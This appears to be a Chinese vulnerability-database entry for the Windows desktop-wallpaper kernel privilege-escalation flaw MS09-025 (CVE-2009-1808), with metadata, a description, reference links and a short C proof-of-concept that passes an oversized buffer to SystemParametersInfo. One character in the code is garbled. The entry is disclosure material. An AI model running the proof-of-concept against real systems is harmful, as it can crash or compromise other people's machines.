Microsoft Windows桌面墙纸系统参数本地权限提升漏洞(MS09-025)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117323 漏洞类型 设计错误
发布时间 2009-02-02 更新时间 2009-05-28
CVE编号 CVE-2009-1808 CNNVD-ID CNNVD-200905-325
漏洞平台 Windows CVSS评分 4.9
|漏洞来源
https://www.exploit-db.com/exploits/33012
https://www.securityfocus.com/bid/80608
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-325
|漏洞详情
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。在编辑特定的桌面参数时,Windows内核没有正确地验证从用户态传递到内核的输入,导致权限提升漏洞。成功利用此漏洞的攻击者可以运行内核态中的任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
|漏洞EXP
source: http://www.securityfocus.com/bid/35120/info

Microsoft Windows is prone to a local privilege-escalation vulnerability.

Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. 

#include <windows.h>
int main()
{
 WCHAR c[1000] = {0};
 memset(c, �c�, 1000);
 SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);

 WCHAR b[1000] = {0};
 SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
 return 0;
}
|受影响的产品
Microsoft Windows XP Tablet PC Edition SP3 Microsoft Windows XP Professional SP3 Microsoft Windows XP Media Center Edition SP3 Microsoft Windows XP Home SP3 Microsoft Windows XP 64-bit Ed
|参考资料

来源:XF
名称:win-spisetdeskwallpaper-dos(50903)
链接:http://xforce.iss.net/xforce/xfdb/50903
来源:SECTRACK
名称:1022330
链接:http://www.securitytracker.com/id?1022330
来源:BID
名称:35120
链接:http://www.securityfocus.com/bid/35120
来源:MISC
链接:http://www.ragestorm.net/blogs/?p=78
来源:SECUNIA
名称:35323
链接:http://secunia.com/advisories/35323